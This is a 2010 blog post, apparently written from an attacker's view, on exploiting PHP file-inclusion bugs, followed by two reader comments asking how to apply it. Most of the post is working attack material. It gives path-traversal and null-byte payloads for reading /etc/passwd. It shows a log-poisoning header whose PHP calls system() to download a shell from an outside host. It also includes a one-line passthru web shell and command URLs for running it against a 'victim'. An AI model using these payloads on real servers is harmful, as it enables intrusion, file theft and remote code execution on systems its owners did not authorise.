Insecure PHP Functions And Their Exploits…

May 27, 2010 at 9:14 pm (LFI / RFI, PHP, Programming, Security)

Hey all,

I am going to list various PHP functions and their misuses along with ways to manipulate them:

require($filename);
http://localhost/?filename=/etc/passwd

require("stuff/".$filename);
http://localhost/?filename=/../../../../../etc/passwd

require("stuff/".$filename.".php");
http://localhost/?filename=/../../../../../etc/passwd%00

require("stuff/".$_COOKIE['something'].".php");
javascript:document.cookie = "something=../../../../../etc/passwd%00";

A neat little trick to allow you to upload stuff using these LFI / RFI vulnerabilities, is to poison the log files (access_log / error_log). I figured, the easiest way to do this was to load the live HTTP headers Firefox plug in. Load the LFI page in your browser, capture the request, and change the User-Agent string to some PHP code of your choice. You can then browse to the log file using the LFI or RFI vulnerability, then when the page loads it will execute your PHP code. Look at these headers for instance:

Host: localhost
User-Agent: <?php system('GET http://www.example.com/phpshell/shell.txt > shell.php'); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

If you replay this using live HTTP headers it will poison the log file with:

127.0.0.1 - - [27/May/2010:21:30:17 +0100]
"GET /testing/vuln.php?COLOR=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 855 "-" "<?php system('GET.php'); ?>"

Then when you view the log file using the LFI / RFI it will execute the above PHP code. You can then browse to the PHP shell (shell.php) that will be located in the same directory as the LFI / RFI page :-)

So, say we placed the following code into shell.php:

<? passthru($_GET[pwn]) ?>

Now we have that piece of code on our victim which we can navigate to through the following URL:

http://localhost/shell.php

To take advantage of this simple PHP shell, alls we have to do is:

http://localhost/shell.php%00&pwn=cat%20/etc/passwd%00

http://localhost/shell.php%00&pwn=uname%20-a

http://localhost/shell.php%00&pwn=who

http://localhost/shell.php%00&pwn=ps%20afuuwx

Then the command output will be displayed on the page :-)

A quick note:

%00 is a NULL
%20 is a SPACE

Until the next time…

2 Comments

  1. pearl said,

    December 16, 2010 at 8:26 am

    I wonder if a silly noob can ask for your help..
    if not I hope it’s not rude to have tried :)

    I’ve tried to use your excellent tip for poisoning log files
    first thing, in this line:
    User-Agent:
    does “example.com” refer to where I host a shell to remotely include? I think so, but I want to make sure

    Then I absolutely didn’t get the relevance to the next step:
    “GET /testing/vuln.php?COLOR=../../../../../../../../../../etc/passwd%00 HTTP/1.1″
    200 855 “-” “”
    the first line is a lfi, I understand. but where does the “” come from? or where do I have to enter it?

    btw I was using HAS to manipulate headers

    Thank you

    Reply

  2. pearl said,

    December 16, 2010 at 8:29 am

    sorry, the piece of code is being removed, I guess,

    php system(‘GET.php’); ?
    (where it was posted as
    200 855 “-” “”)

    Reply

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

Follow

Get every new post delivered to your Inbox.